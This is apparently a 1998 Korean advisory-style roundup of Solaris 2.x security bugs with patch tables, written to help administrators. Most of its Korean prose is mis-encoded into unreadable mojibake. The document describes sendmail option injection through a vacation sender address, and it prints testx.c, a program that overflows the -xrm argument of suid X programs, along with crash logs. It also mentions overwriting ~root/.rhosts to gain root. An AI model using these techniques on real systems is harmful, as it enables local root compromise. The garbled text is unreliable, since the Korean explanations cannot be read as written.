ÀÌ ¹®¼´Â Solaris 2.x (2.3 ~ 2.6) OS Áß ½É°¢ÇÑ security »óÀÇ ¹®Á¦¸¦ ÀÏÀ¸Å°´Â ¹ö±×µé¿¡ ´ëÇØ »ó¼¼È÷ ¼³¸íÇßÀ¸¸ç, ±× ÇØ°áÃ¥À» Á¦½ÃÇÏ°í ÀÖ´Ù. SunOS 4.x , Solaris 2.0 , Solaris 2.1 , Solaris 2.2 ¿¡µµ ÇØ´çµÇ´Â ¹ö±×µµ ÀÖÀ¸³ª ÀÌ ºÎºÐ¿¡ ´ëÇÑ ¾ð±ÞÀº ÇöÀç ´ëºÎºÐÀÇ SUN ½Ã½ºÅÛÀÌ Solaris 2.3 ~ Solaris 2.6 ¹öÀüÀ» žÀçÇÏ°í ÀÖÀ½À» ¹Ý¿µÇÏ¿© ¼³¸íÀ» »ý·«ÇÏ¿´´Ù. ÇÏÁö¸¸ Ÿ OS ¿¡µµ °øÅëÀ¸·Î Á¸ÀçÇÏ´Â critical ÇÑ ¹ö±×ÀÇ °æ¿ì¿¡´Â ¾ð±ÞÀ» ÇÏ¿´´Ù. ÀÌ ¹®¼¿¡¼ ÁÖ·Î Âü°í·Î »ïÀº ¹®¼´Â Sun Security Bulletin À̸ç bugtraq µî°ú °°Àº °÷¿¡ ÇØÅ· ½ºÅ©¸³Æ®, ÇÁ·Î±×·¥°ú ÇÔ²² ¹èÆ÷µÇ´Â Åä·Ð³»¿ë, ¹ö±×¿¡ ´ëÇÑ ¼³¸íµéµµ ¼³¸í¿¡ ¹Ý¿µÇÏ¿´´Ù.
ÀÌ ¹®¼´Â À§ÀÇ Âü°í ¹®ÇåµéÀ» ±â¹ÝÀ¸·Î »ï°í Àֱ⠶§¹®¿¡ Solaris 2.x »ó¿¡ Á¸ÀçÇÏ´Â ¸ðµç º¸¾È»óÀÇ ¹ö±×¸¦ ´Ù·é °ÍÀÌ ¾Æ´ÔÀ» Àؾ ¾ÈµÈ´Ù. ²÷ÀÓ¾øÀÌ SUN ¿¡¼ Á¦°øÇÏ´Â ÆÐÄ¡µéÀ» ºÎÁö·±È÷ Àû¿ëÇÏ´Â °ÍÀÌ Áß¿äÇÏ´Ù°í »ý°¢ÇÑ´Ù.
º°°Í ¾Æ´Ñ ¹®¼Áö¸¸ ÀÌ ¹®¼°¡ ±¹³» °ü¸®Àڵ鿡°Ô µµ¿òÀÌ µÇ±æ ¹Ù¶õ´Ù.
¡¡ÀÌ ±Û¿¡ ´ëÇÑ ¸ðµç ±Ç¸®´Â ±Û¾´ÀÌÀÎ ±èÈÖ° (sakai@major.kaist.ac.kr) ¿¡°Ô ÀÖÀ¸¸ç, ±Û¾´ÀÌÀÇ ÀúÀÛ±ÇÀ» "¸í½ÃÇØÁÖ°í" , »ó¾÷ÀûÀÎ ¸ñÀû¿¡ »ç¿ëÇÏÁö ¾Ê´Â ÇÑ, ÀÌ ±ÛÀÇ ÀϺΠȤÀº ÀüºÎ¸¦ "º¯Çü ¾øÀÌ" º¹»ç, ¹èÆ÷ÇÏ´Â °ÍÀ» Çã¿ëÇÕ´Ï´Ù.
¡¡Bugs of Solaris 2.x in 1998
List up and Considering about Solaris 2.x 's critical bugs in 1998
¸ñÀû:
1998 ³âµµ¿¡ ÇÖ À̽´·Î ¶°¿À¸¥ Solaris 2.x ÀÇ ¹ö±×µéÀÌ ¾î¶² °ÍÀÌ ÀÖ´ÂÁö ÆľÇÇÏ°í °£´ÜÈ÷ ¹®Á¦Á¡ÀÌ ¹ß»ýÇÑ ¿øÀÎÀ» ºÐ¼®ÇÑ µÚ ÆÐÄ¡ ¹æ¹ý¿¡ ´ëÇØ ¾Ë¾Æº»´Ù.
¡¡
1. volrmmount (1998/2/10) ; bug id #162
1.
volrmmount (1)
2.
ÇØ´ç ½Ã½ºÅÛSunOS versions 5.6, 5.6_x86
3. Description of Bugs
volrmmount (1) Àº Solaris 2.6 ¿¡¼ºÎÅÍ Á¦°øµÇ±â ½ÃÀÛÇÑ Ä¿¸ÇµåÀÌ´Ù.
ÀÌ ¸í·É¾î´Â removable media ÀÇ insert ¿Í eject ¸¦ control ÇÏ´Â Ä¿¸ÇµåÀε¥ ¹®Á¦¸¦ ÀÏÀ¸Å°´Â ´ëºÎºÐÀÇ ÇÁ·Î±×·¥ÀÌ ±×·¯Çϵí, ÀÌ ÇÁ·Î±×·¥ ¿ª½Ã setuid bit °¡ ºÙ¾îÀÖ°í, root ¼ÒÀ¯ÀÇ program ÀÌ´Ù.
¿¹ÀüÀÇ vold , eject ÀÇ Ä¿¸ÇµåµéÀÌ ÀÏÀ¸Ä×´ø °Í°ú À¯»çÇÑ ¹æ½ÄÀÇ ¹®Á¦ÀÌ´Ù.
ÀÌ ÇÁ·Î±×·¥À» ÀÌ¿ëÇؼ ÀÏ¹Ý »ç¿ëÀÚ¶ó¸é ´©±¸¶óµµ ½Ã½ºÅÛ ³»ÀÇ ¾î¶°ÇÑ ÈÀÏÀ» ¾×¼¼½º ÇÒ ¼ö°¡ ÀÖ°Ô µÇ°í, ÀÌ·Î ÀÎÇØ ·çÆ®ÀÇ ±ÇÇѵµ ¾òÀ» ¼ö ÀÖ°Ô µÈ´Ù.
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®¡¡
SunOS 5.6_x86
ftp://sunsolve1.sun.com/pub/patches/105408-01.tar.Z¡¡
5. References
¡¡
2. vacation (1998/3/4) ; bug id #163
1.
vacation (1)
2.
ÇØ´ç ½Ã½ºÅÛ3. Description of Bugs
vacation (1) Àº »ç¿ëÀÚ°¡ ÇöÀç ¸ÞÀÏÀ» ÀÐÀ» ¼ö ¾ø´Â °æ¿ì (À̸¦Å׸é ÈÞ°¡), ½Å±Ô ¸Þ½ÃÁö¿¡ ´ëÇØ ÀÚµ¿À¸·Î ´äÀåÀ» ÇØÁÖ´Â ÇÁ·Î±×·¥ÀÌ´Ù.
$HOME/.forward ¿¡ ¾Æ·¡¿Í °°Àº Ç׸ñÀ» »ðÀÔÇÏ¿© vacation ÇÁ·Î±×·¥À» »ç¿ëÇÏ°Ô µÈ´Ù.
\user, "|/usr/bin/vacation user"
¡¡
vacation ÇÁ·Î±×·¥ÀÌ ½Å±Ô¸Þ½ÃÁö¿¡ ÀÀ´äÇÒ ¶§ sendmail Ä¿¸Çµå¸¦ È£ÃâÇÏ°Ô µÇ´Âµ¥, Ä¿¸Çµå ¶óÀο¡ sender ÀÇ address ¸¦ ¸í½ÃÇÏ°Ô µÈ´Ù.
ÀÌ ¶§ Ä¿¸Çµå ¶óÀÎ»ó¿¡ sender ÀÇ e-mail address ¸¦ ³Ñ°ÜÁÙ ¶§ e-mail address ¸¦ Á¶ÀÛÇؼ sendmail ÀÇ configuration file À» ÀоîµéÀÌ´Â ¿É¼ÇÀ» ³Ñ°ÜÁÙ ¼ö ÀÖ°Ô µÈ´Ù.
(¿¹: -C/var/mail/user ·Î ÁöÁ¤À» Çϸé sendmail ÀÌ /var/mail/user ¸¦ configuration file ·Î »ç¿ëÇÏ°Ô µÈ´Ù.)
ÇØÅ·¿¡ »ç¿ëµÉ configuration file Àº ¹Ì¸® email messages ³ª anonymous ftp ¸¦ ÀÌ¿ëÇÏ¿© Àü¼ÛÇØ µÎ´Âµ¥ (À§ÀÇ ¿¹¿¡¼´Â /var/mail/user ÀÇ mail spool file À» sendmail ÀÇ configuration ÆÄÀÏ Ã³·³ »ç¿ëÇÏ°Ô µÈ´Ù. ), sendmail ÀÌ ½ÇÇà µÉ¶§ ´Ù¸¥ ÇØÄ¿°¡ ÁöÁ¤ÇÑ Ä¿¸Çµå¸¦ ½ÇÇà½ÃÅ°µµ·Ï Á¶ÀÛÇصдÙ.
ÇØÅ·¿¡ ¼º°øÇÏ°Ô µÇ¸é sendmail Àº configuration file ¿¡ ¸í½ÃµÈ ÀÓÀÇÀÇ Ä¿¸Çµå¸¦ ½ÇÇà½ÃÅ°°Ô µÈ´Ù.
¡¡
Âü°í : ÀÌ ¹ö±×´Â Liudvikas Bukys ¿¡ ÀÇÇØ 1994 ³â¿¡ ¹ß°ßµÇ¾ú´Ù.
¡¡
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®vacation Àº autoreply ¿Í ¸¶Âù°¡Áö·Î ±×´ÙÁö ¸¹ÀÌ »ç¿ëµÇÁö ¾Ê´Â ÇÁ·Î±×·¥ÀÌ´Ù.
OS vendor ¿¡¼ Á¦°øÇÏ´Â ÆÐÄ¡¸¦ ÇÏ´ø°¡
# chmod 0 /usr/bin/vacation
°ú °°ÀÌ ¾Æ¿¹ disable ½ÃÄѵµ ÁÁÀ» °ÍÀÌ´Ù.
ÇÏÁö¸¸ vacation À» ²À ½á¾ß ÇÏ´Â °æ¿ì¶ó¸é Àӽ÷Π¹ö±×°¡ fix µÈ vacation À» ¼³Ä¡Çϵµ·Ï ÇÑ´Ù.
ftp://testcase.software.ibm.com/aix/fromibm/vacation.security.tar.Z¡¡
¾ÆÁ÷ ÆÐÄ¡´Â Á¸ÀçÇÏÁö ¾Ê´Â´Ù.
1997/08/29 ÀÌÀü ¹öÀüÀÇ OpenBSD ¿¡ ¾ÆÁ÷ ¹ö±×°¡ Á¸ÀçÇÑ´Ù.
2.1-stable , 2.2-stable , 3.0-current (1997/08/28) ¹öÀü¿¡¼ ¹®Á¦°¡ ÇØ°áµÇ¾ú´Ù. °ð ³ª¿Ã FreeBSD 2.2.5-RELEASE ¿Í 3.0-RELEASE ¹öÀü¿¡¼µµ ÀÌ ¹®Á¦Á¡Àº ¼öÁ¤µÉ °ÍÀÌ´Ù.
19970828 ÀÌÈĹöÀüÀ¸·Î ¾÷±×·¹À̵å ÇÒ °ÍÀ» ±ÇÇÑ´Ù.
¡¡
ÀÌ¹Ì Patch ¸¦ Á¦°øÇØ ÁÖ°í ÀÖ´Ù.
OS version |
Patch ID |
SunOS 5.6 |
105518-01 |
SunOS 5.6_x86 |
105519-01 |
SunOS 5.5.1 |
105520-01 |
SunOS 5.5.1_x86 |
105521-01 |
SunOS 5.5 |
105533-01 |
SunOS 5.5_x86 |
105534-01 |
SunOS 5.4 |
102066-21 |
SunOS 5.4_x86 |
102064-19 |
SunOS 5.3 |
101782-02 |
SunOS 4.1.4 |
105466-01* |
SunOS 4.1.3_U1 |
105465-01* |
À§ÀÇ ÆÐÄ¡µéÀº sendmail V8 ¿¡¼¸¸ ÀÛµ¿µÇ¹Ç·Î sendmail V5 ¸¦ »ç¿ëÇÏ´Â °æ¿ì V8 ·Î ¾÷±×·¹À̵å Çϵµ·Ï ÇÑ´Ù.
¾Æ·¡ÀÇ ftp site ¿¡¼ ÆÐÄ¡µÈ vacation À» °¡Á®´Ù°¡ ¼³Ä¡Çϵµ·Ï ÇÑ´Ù.
ftp://ftp.secnet.com/pub/patches/vacation.tar.ZÀ§ÀÇ ÆÐÄ¡´Â Eric Allman °ú Keith Bostic ¿¡ ÀÇÇØ °³¹ßµÈ °ÍÀε¥, sendmail version 8 ÀÌ¿ÜÀÇ ¹öÀü¿¡¼ "--" ¿É¼ÇÀ» Á¦´ë·Î Çؼ®Çϵµ·Ï getopt() ¸¦ ¾Ö¹Ä·¹ÀÌÆ® ÇÏ´ÂÁö´Â È®ÀεÇÁö ¾Ê¾ÒÀ¸¹Ç·Î, ÀÌ ÆÐÄ¡¸¦ ÀÌÀü ¹öÀüÀÇ sendmail ¿¡ Àû¿ë½ÃÅ°°íÀÚ ÇÏ´Â °æ¿ì¿¡´Â sendmail command line ¿É¼ÇÀÌ " --" ÀÏ °æ¿ì getopt() ¸¦ »ç¿ëÇÏÁö ¾ÊÀº °æ¿ì parsing À» ÇÒ ¼ö ¾ø°Ô µÇ¹Ç·Î vacation.c ³»ÀÇ ¾Æ·¡ÀÇ Äڵ尡
execl(_PATH_SENDMAIL, "sendmail", "-f", myname, from, NULL);
¾Æ·¡ÀÇ ÄÚµå·Î ¹Ù²î¾î¾ß ÇÑ´Ù.
execl(_PATH_SENDMAIL, "sendmail", "-f", myname, "--", from, NULL);
¡¡
5. References
¡¡
3. dtaction (1998/3/4) ; bug id #164
1.
dtaction
2.
ÇØ´ç ½Ã½ºÅÛCDE ¸¦ »ç¿ëÇÏ°í ÀÖ´Â SunOS versions 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86
3. Description of Bugs
dtaction À¯Æ¿¸®Æ¼´Â application À̳ª shell script °¡ CDE (common desktop environment) °³¹ßȯ°æ¿¡¼ action request °¡ ¿ÔÀ» ¶§ È£Ãâ µÉ ¼ö ÀÖµµ·Ï ÇØÁÖ´Â ÇÁ·Î±×·¥ÀÌ´Ù. º¸Åë /usr/dt/bin/ ¿¡ À§Ä¡ÇÑ´Ù.
dtaction ÇÁ·Î±×·¥ÀÇ argument ¿¡ ´ëÇÑ boundary checking À» ¾ÈÇØÁֱ⠶§¹®¿¡ stack overflow ¸¦ ÀÏÀ¸ÄÑ ³»ºÎ stack °ø°£À» overwrite ½ÃÅ°°Ô µÉ ¼ö Àִµ¥ ¾Æ·¡¿¡¼ º¸´Â °Íó·³ dtaction Àº setuid root ÇÁ·Î±×·¥À̹ǷΠ, ÀÌ ÇÁ·Î±×·¥À» ÀÌ¿ëÇؼ root ±ÇÇÑÀ» ¾ò°Ô ÇÒ ¼ö ÀÖ´Ù.
¡¡
[major /usr/dt/bin 47 ] ls -asl dtaction
44 -r-sr-sr-x 1 root sys 22516 1996³â 4¿ù 13ÀÏ dtaction*
µÞºÎºÐ¿¡¼ ¼³¸íÇÒ CDE ÀÇ ¹®Á¦Á¡ ¹× X Library ÀÇ ¹®Á¦Á¡¿¡¼µµ À̾߱â ÇÏ°ÚÁö¸¸, dtaction ÀÇ ¹®Á¦Á¡Àº ±Ùº»ÀûÀ¸·Î CDE ¿Í X Library ÀÇ ¹®Á¦Á¡¿¡ ±âÀÎÇÑ´Ù.
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®¡¡
CDE version | Patch ID |
1.2 |
105669-02 |
1.2_x86 |
105670-02 |
1.02 |
105716-02 |
1.02_x86 |
105717-02 |
1.01 |
105714-02 |
1.01_x86 |
105715-02 |
¡¡
4. CDE
ÀÇ ¹®Á¦Á¡dtaction °ú °ü·ÃÇÏ¿© CDE Àü¹Ý¿¡ °ÉÄ£ ¹®Á¦Á¡À» Çѹø »ìÆ캸±â·Î ÇÏÀÚ.
¡¡
1.
ÇØ´ç packageCDE (Common desktop Environment)
2.
ÇØ´ç ½Ã½ºÅÛ¿©±â¿¡
ÇØ´çµÇ´Â OS ³»¿¡¼ CDE ¸¦ ¼³Ä¡ÇÑ °æ¿ì¿¡¸¸ ÇØ´çµÈ´Ù.¡¡
3. Description of Bugs
dtappgather ÇÁ·Î±×·¥Àº »ç¿ëÀÚ¿¡ ÀÇÇØ ³Ñ¾î¿À´Â Á¤º¸¸¦ ÀûÀýÈ÷ Á¡°ËÇÏÁö ¾Ê´Â´Ù. ÀÌ·¯ÇÑ ¹®Á¦Á¡À» ¾Ç¿ëÇÏ¿© ½Ã½ºÅÛÀÇ root ±ÇÇÑÀ» ¾òÀ» ¼ö ÀÖÀ» »Ó ¾Æ´Ï¶ó Denial of Service Attack µµ ÇÒ ¼ö ÀÖ°Ô µÈ´Ù.
´õ ±¸Ã¼ÀûÀ¸·Î À̾߱â Çϸé Local »óÀÇ »ç¿ëÀÚ´Â ÀÓÀÇÀÇ ÆÄÀÏ¿¡ write ±ÇÇÑÀ» ¾òÀ» ¼ö ÀÖ°Ô µÇ¹Ç·Î À̸¦ ¾Ç¿ëÇÏ¿© root ±ÇÇÑÀ» ¾ò´Â °Í ¿ª½Ã °¡´ÉÇÏ°Ô µÈ´Ù. (¿¹: ~root/.rhosts) ¶ÇÇÑ ÀÓÀÇÀÇ µð·ºÅ丮¸¦ »èÁ¦ÇÒ ¼öµµ ÀÖ°Ô µÇ¹Ç·Î ½Ã½ºÅÛÀÇ Áß¿äÇÑ µð·ºÅ丮¸¦ »èÁ¦ÇÏ¿© ¼¹ö¸¦ ¼ºñ½ººÒ´É»óÅ·Π¸¸µé ¼ö ÀÖ°Ô µÇ´Â °ÍÀÌ´Ù.
¡¡
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®ÇöÀç °³¹ßÁß¿¡ ÀÖ´Ù. ÆÐÄ¡»çÀÌÆ®¿¡¼ °ð ¹ßÇ¥µÉ ¿¹Á¤ÀÌ´Ù.
dtappgather °¡ Æ÷ÇÔµÈ AIX ÀÇ Àü¹öÀü¿¡ ¹®Á¦Á¡ÀÌ Á¸ÀçÇÑ´Ù.
¡¡
¡¡
5. X Library
ÀÇ ¹®Á¦Á¡1.
ÇØ´ç packageX library
2.
ÇØ´ç ½Ã½ºÅÛ´ëºÎºÐÀÇ UNIX system
3. Description of Bugs
¾Æ·¡ÀÇ ³»¿ëµéÀº David Hedley ¿¡ ÀÇÇØ ÁöÀûµÈ ¹®Á¦Á¡µéÀÌ´Ù.
´ëºÎºÐÀÇ UNIX platform ÀÇ X library ¿¡¼ resource manager routine ¿¡ °áÇÔÀÌ Á¸ÀçÇÑ´Ù. ¿ì¼±ÀûÀ¸·Î suid °¡ °É·ÁÀÖ´Â ÇÁ·Î±×·¥µé Áß X resource manager routine À» »ç¿ëÇÏ´Â X library ¿¡ ¿¬°áµÇ¾î ÀÖ´Â °ÍµéÀº ±× ÇÁ·Î±×·¥ ÀÚü°¡ º¸¾È»ó °áÇÔÀÌ ¾ø´Ù ÇÒ Áö¶óµµ, buffer overflow ¸¦ ÀÏÀ¸Å³ ¼ÒÁö°¡ ÀÖ´Ù.
¡¡
ÀÌ°ÍÀ» Å×½ºÆ® Çغ¸ÀÚ. ¾Æ·¡ÀÇ ÇÁ·Î±×·¥À» ÄÄÆÄÀÏÇؼ ¿©·¯ suid °¡ °É·ÁÀÖ´Â X windows ÇÁ·Î±×·¥µéÀÇ ÆĶó¹ÌÅÍ·Î ½ÇÇà½ÃÄѺ¸ÀÚ. ¸¸ÀÏ segmentation fault ³ª bus error °¡ ¹ß»ýÇÑ´Ù¸é ÀáÀçÀûÀ¸·Î ¹®Á¦Á¡ÀÌ Á¸ÀçÇÑ´Ù°í º¼ ¼ö ÀÖ´Ù.
¡¡
testx.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
¡¡
void main(int argc, char **argv)
{
char *env[] = {0};
char buffer[18000]; /* Irix has a 20k limit for environment+args */
if (argc < 2)
exit(1);
memset(buffer,'a',sizeof buffer);
buffer[sizeof buffer-1] = '\0';
execle(argv[1], argv[1], "-xrm", buffer, 0, env);
perror("exec failed");
}
% ./testx /usr/bin/X11/xterm
zsh: bus error ./testx /usr/bin/X11/xterm
% ./testx /usr/bin/X11/cdplayer
zsh: bus error ./testx /usr/bin/X11/cdplayer
% ./testx /usr/bin/X11/xconsole
zsh: bus error ./testx /usr/bin/X11/xconsole
% ./testx /usr/bin/X11/xlock
Xlib: connection to ":0.0" refused by server
Xlib: Client is not authorized to connect to Server
xlock: unable to open display :0.
¿ì¼± À§ÀÇ ½ÇÇà ¿¹¿¡¼´Â xlock Àº ¹®Á¦°¡ ¾ø´Â °ÍÀ¸·Î ³ª¿ÔÁö¸¸ ¾Æ·¡ÀÇ ¿¹¿¡¼´Â ÀáÀçÀûÀ¸·Î´Â ¹®Á¦°¡ Á¸ÀçÇÏ´Â °ÍÀ» ¾Ë ¼ö ÀÖ´Ù.
¡¡
% ./testx /usr/dt/bin/dtprintinfo
zsh: bus error ./testx /usr/dt/bin/dtprintinfo
% ./testx /usr/dt/bin/dtaction
zsh: bus error ./testx /usr/dt/bin/dtaction
¡¡
%./testx /usr/X11R6/bin/xlock
zsh: segmentation fault ./testx /usr/X11R6/bin/xlock
%./testx /usr/X11R6/bin/color_xterm
zsh: segmentation fault ./testx /usr/X11R6/bin/color_xterm
%./testx /usr/X11R6/bin/xterm
zsh: segmentation fault ./testx /usr/X11R6/bin/xterm
Âü°í·Î ½ÇÇè¿¡ »ç¿ëµÈ xlock Àº xlockmore-4.02 À¸·Î ÃֽŹöÀüÀÌ´Ù.
¡¡
% uname -a
Linux xwing 2.0.0 #5 Fri Feb 21 13:01:20 PST 1997 i486
% testx /usr/X11/bin/xload
Segmentation fault
% testx /usr/X11/bin/xlock
Segmentation fault
% testx /usr/X11/bin/xterm
Segmentation fault
¡¡
$ cat /etc/redhat-release
release 4.1 (Vanderbilt)
$ uname -a
Linux turing.imm.net 2.0.30 #3 Sat Apr 26 22:55:36 MET DST 1997 i686
$ find /usr/X11R6 -perm +6000 -exec ls -l {} \;
-rws--x--x 1 root root 144868 Feb 13 03:49 /usr/X11R6/bin/xterm
-rws--x--x 1 root root 159472 Nov 20 1996 /usr/X11R6/bin/kterm
-rwsr-xr-x 1 root bin 710284 Feb 19 07:54 /usr/X11R6/bin/Xmetro
-r-sr-xr-x 1 root root 10464 Dec 19 01:01 /usr/X11R6/bin/XConsole
-rwsr-xr-x 1 root root 53464 Jan 31 23:16 /usr/X11R6/bin/rxvt
-rwxr-sr-x 1 root uucp 98364 Nov 21 1996 /usr/X11R6/bin/seyon
-rwxr-sr-x 1 root daemon 181436 Nov 20 1996 /usr/X11R6/bin/xbill
-rws--x--x 1 root root 136504 Nov 20 1996 /usr/X11R6/bin/nxterm
-rwsr-xr-x 1 root bin 477408 Aug 16 1996 /usr/X11R6/lib/X11/
AcceleratedX/arch/LINUX/Xaccel
¡¡
$ ./testx /usr/X11R6/bin/xterm
Segmentation fault
$ ./testx /usr/X11R6/bin/kterm
^[[ASegmentation fault
$ ./testx /usr/X11R6/bin/XConsole
Segmentation fault
$ ./testx /usr/X11R6/bin/rxvt
rxvt: bad option "-xrm"
rxvt: bad option
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa$
[spam]
Usage v2.19:
rxvt [-help]
[-display displayname] [-geometry geom] [-/+rv] [-bg color] [-fg color]
[-fn fontname] [-iconic] [-name string] [-title string] [-n string]
[-cr color] [-/+ls] [-/+sb] [-sl number] [-/+ut] [-/+vb] [-C]
[-e command arg ...]
¡¡
$ ./testx /usr/X11R6/bin/seyon
>> Warning: Could not execute `seyon-emu.
>> Notice: Falling to `xterm'.
>> Error: Could not execute `xterm'.
>> Notice: Giving up.
$ ./testx /usr/X11R6/bin/xbill
Segmentation fault
$ ./testx /usr/X11R6/bin/nxterm
Segmentation fault
¡¡
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®AUSCERT ¿¡¼ °³¹ßÇÑ buffer overflow wrapper ¸¦ ¾Æ·¡ÀÇ »çÀÌÆ®¿¡¼ ±¸ÇÏ¿© ¼³Ä¡Çϵµ·Ï ÇÑ´Ù.
ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper/overflow_wrapper.c http://cegt201.bradley.edu/~im14u2c/wrapper/¡¡
6. ndd (1998/3/11) ; bug id #165
1.
ndd (1M)
2.
ÇØ´ç ½Ã½ºÅÛSunOS 5.6 , SunOS 5.6_x86.
3. Description of Bugs
ndd ¸¦ »ç¿ëÇÏ¿© TCP/IP Ä¿³Î parameter µéÀ» ¼¼ÆÃÇÒ ¼ö Àִµ¥ , ndd ¸¦ ¾Ç¿ëÇÏ¿© ÇØÄ¿µéÀÌ ÀÓÀÇ·Î parameter µéÀ» ¼¼ÆÃÇÒ ¼ö ÀÖ°Ô µÇ¾î denial of service °ø°ÝÀ» ÇÒ ¼ö ÀÖ°Ô µÈ´Ù.
¡¡
OS Version | Patch ID |
SunOS 5.6 |
105786-01 |
SunOS 5.6_x86 |
105787-01 |
5. References
¡¡
7. rpc.cmsd (1998/3/11) ; bug id #166
1.
rpc.cmsd
2.
ÇØ´ç ½Ã½ºÅÛ3. Description of Bugs
rpc.cmsd
Àº ÀÏÁ¤°ü¸®³ª µ¥ÀÌÅÍÀÇ resource-scheduling ¿¡ ¾²ÀÌ´Â ÀÛÀº database manager ÀÌ´Ù. client ·Î´Â Openwindows ÀÇ calendar manager ³ª CDE ÀÇ calendar °¡ ÀÖ´Ù.ÀÌ
ÇÁ·Î±×·¥¿¡ Á¸ÀçÇÏ´Â ¹®Á¦Á¡À» ÀÌ¿ëÇؼ ÀÓÀÇÀÇ ÆÄÀÏ¿¡ ¾î¶² ³»¿ëÀÌ¶óµµ overwrite ½Ãų ¼ö ÀÖ°Ô µÇ¾î root ±ÇÇÑÀ» ¾òÀ» ¼ö ÀÖ°Ô µÈ´Ù.¡¡
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®SunOS | Patch ID |
|
SunOS 5.5.1 |
104976-03 |
|
SunOS 5.5.1_x86 |
105124-02 |
|
SunOS 5.5 |
103251-07 |
|
SunOS 5.5_x86 |
103273-04 |
|
SunOS 5.4 |
102030-09 |
|
SunOS 5.4_x86 |
102031-07 |
|
SunOS 5.3 |
101513-12 |
|
SunOS 4.1.4 |
100523-24 |
|
SunOS 4.1.3_U1 |
100523-24 |
CDE version | Patch ID |
1.02 |
103670-04 |
1.02_x86 |
103717-04 |
1.01 |
103671-04 |
1.01_x86 |
103718-04 |
¡¡
8. rpcbind (1998/4/8) ; bug id #167
1.
rpcbind
2.
ÇØ´ç ½Ã½ºÅÛSunOS versions 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3.
3. Description of Bugs
rpcbind
ÇÁ·Î±×·¥Àº RPC ÇÁ·Î±×·¥ number ¸¦ universal address ·Î ÀüȯÇØ ÁÖ´Â ¼¹öÇÁ·Î±×·¥ÀÌ´Ù. RPC ¼ºñ½º°¡ ½ÃÀ۵Ǹé rpcbind ¸¦ ÅëÇØ RPC ¼ºñ½º°¡ listening ÇÏ°í ÀÖ´Â ÁÖ¼Ò¿Í ¼ºñ½ºÇÒ Áغñ°¡ µÈ RPC ÇÁ·Î±×·¥ number ¸¦ Àü´ÞÇÑ´Ù.ÀÌ rpcbind ¿¡ ¹®Á¦Á¡ÀÌ ¹ß°ßµÇ¾ú´Âµ¥ À̸¦ ¾Ç¿ëÇÏ¿© ´©±¸³ª ÀÓÀÇÀÇ ÆÄÀÏ¿¡ overwrite ÇÒ ¼ö ÀÖ°Ô µÇ¾î ½Ã½ºÅÛ Á¢±Ù±ÇÇÑÀ» °¡Áö°Ô µÈ´Ù.
¶ÇÇÑ Nicolas Dubee ¿¡ ÀÇÇϸé rpcbind °¡ SIGTERM À̳ª SIGINT ½Ã±×³ÎÀ» ¹Þ¾Æ Á¾·áµÇ´Â °æ¿ì, ÇöÀç registerµÈ ¼ºñ½ºÀÇ ¸®½ºÆ®¸¦ /tmp/portmap.file °ú /tmp/rpcbind.file ¿¡ ½Éº¼¸¯ ¸µÅ©³ª ´Ù¸¥ »çÇ׵鿡 ´ëÇÑ ¾Æ¹«·± checking ¾øÀÌ ±â·ÏÇÏ°Ô µÈ´Ù. À̸¦ ¾Ç¿ëÇÏ¿© file system ³»ÀÇ ÀÓÀÇÀÇ ÆÄÀÏ¿¡ ±â·ÏÇϵµ·Ï Á¶ÀÛÇÒ ¼ö ÀÖ´Ù°í ÇÑ´Ù. (¿¹: .rhosts)
rpcbind °¡ ½ÃÀÛÇÒ ¶§ -d ¿É¼ÇÀ» ÁÖ¾î debug ¸ðµå·Î ÀÛµ¿ÇÏ°Ô ÇÏ°í ÀÀ´äºÒ°¡´ÉÇÑ Procedure call À» º¸³½´Ù. (Áï, client °¡ response °¡ º¸³»Áö±â Àü¿¡ connection À» close ÇÑ °æ¿ì), ±×·¸°Ô µÇ¸é rpcbind_abort() ¸¦ ÇÁ·Î¼¼½º°¡ kill µÇ±â Àü¿¡ È£ÃâÇÏ°Ô µÇ´Âµ¥ rpcbind_abort() ´Â write_warmstart() À» È£ÃâÇÏ°Ô µÈ´Ù. write_warmstart() ´Â warmstart Á¤º¸¸¦ /tmp/rpcbind.file °ú /tmp/portmap.file ¿¡ ±â·ÏÇÏ°Ô µÈ´Ù. ´Ü, ÀÌ°ÍÀº debug mode ·Î rpcbind °¡ ½ÃÀÛÇßÀ» °æ¿ì¿¡¸¸ ÀÌ´Ù.
4.
ÇØ°áÃ¥ & ÆÐÄ¡¸®½ºÆ®OS version | Patch ID |
SunOS 5.6 |
105216-03 |
SunOS 5.6_x86 |
105217-03 |
SunOS 5.5.1 |
104331-07 |
SunOS 5.1_x86 |
104332-07 |
SunOS 5.5 |
104357-05 |
SunOS 5.5_x86 |
104358-05 |
SunOS 5.4 |
102070-06 |
SunOS 5.4_x86 |
102071-06 |
SunOS 5.3 |
102034-05 |
¡¡
¾Æ·¡ÀÇ »çÀÌÆ®¿¡¼ Wietse's RPCBIND 2.1 ¹öÀüÀ» ±¸ÇÏ¿© ¼³Ä¡ÇÑ´Ù.
ftp://ftp.win.tue.nl/pub/securityÀ§ÀÇ ÇÁ·Î±×·¥¿¡´Â O_EXCL option ÀÌ Æ÷ÇԵǾî ÀÖ´Ù.
¡¡
5. References
¡¡
9. mountd (1998/4/29) ; bug id #168
1.
rpc.mountd
2.
ÇØ´ç ½Ã½ºÅÛSunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3
3. Description of Bugs
mountd Àº NFS file system mount request À» ó¸®ÇÏ´Â RPC server ÀÌ´Ù.
